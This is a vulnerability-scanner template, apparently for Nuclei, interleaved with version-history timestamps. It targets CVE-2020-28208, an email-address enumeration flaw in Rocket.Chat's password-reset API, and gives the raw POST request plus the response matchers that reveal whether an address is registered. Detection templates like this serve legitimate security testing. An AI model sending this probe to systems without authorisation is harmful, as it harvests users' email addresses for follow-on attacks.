2021-03-29 11:39:45 +00:00
id : CVE-2020-28208
info :
2023-04-04 19:16:35 +00:00
name : Rocket.Chat <3.9.1 - Information Disclosure
2021-03-29 11:39:45 +00:00
author : pdteam
severity : medium
2023-04-04 19:16:35 +00:00
description : Rocket.Chat through 3.9.1 is susceptible to information disclosure. An attacker can enumerate email addresses via the password reset function and thus potentially access sensitive information, modify data, and/or execute unauthorized operations.
2022-04-22 10:38:41 +00:00
reference :
- https://trovent.io/security-advisory-2010-01
2022-05-17 09:18:12 +00:00
- https://trovent.github.io/security-advisories/TRSA-2010-01/TRSA-2010-01.txt
- http://www.openwall.com/lists/oss-security/2021/01/07/1
2023-04-12 10:55:48 +00:00
- http://packetstormsecurity.com/files/160845/Rocket.Chat-3.7.1-Email-Address-Enumeration.html
2023-04-04 19:15:59 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-28208
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 5.3
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-28208
cwe-id : CWE-203
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:*
epss-score : 0.00732
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-04-12 10:55:48 +00:00
tags : packetstorm,cve,cve2020,rocketchat
2021-03-29 11:39:45 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-03-29 11:39:45 +00:00
- raw :
- |
POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1
Host : {{Hostname}}
Origin : {{BaseURL}}
Content-Type : application/json
{"message" : "{\"msg\":\"method\",\"method\":\"sendForgotPasswordEmail\",\"params\":[\"user@local.email\"],\"id\":\"3\"}" }
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
words :
- '"result\":false'
- '"success":true'
part : body
condition : and
2023-04-04 19:15:59 +00:00
# Enhanced by md on 2023/04/04